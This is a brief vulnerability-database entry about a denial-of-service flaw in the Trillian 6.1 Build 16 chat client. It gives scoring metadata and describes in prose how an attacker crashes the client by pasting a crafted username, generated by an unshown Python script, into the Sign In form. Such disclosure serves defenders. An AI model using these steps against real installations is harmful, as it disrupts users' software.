Vendor: Trillian
By: Jose Miguel Gonzalez
CVSS: 7.8 (HIGH)
Denial of Service
CWE: N/A
Product Name: Trillian
Affected Version From: 6.1 Build 16
Affected Version To: 6.1 Build 16
Patch Exists: NO
Related CWE: N/A
CPE: a:cerulean_studios:trillian:6.1
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 10 Single Language x64
2018
Trillian 6.1 Build 16 – ‘Sign In’ Denial of Service (PoC)
A denial of service vulnerability exists in Trillian 6.1 Build 16 when a maliciously crafted username is used in the 'Sign In' process. An attacker can exploit this vulnerability by running the Python script 'trillian.py', copying the contents of 'trillian.txt' to the clipboard, pasting the clipboard into the 'Username' field, entering '1234' in the 'Password' field, and then clicking 'Sign In'. This causes the application to crash.
Mitigation: N/A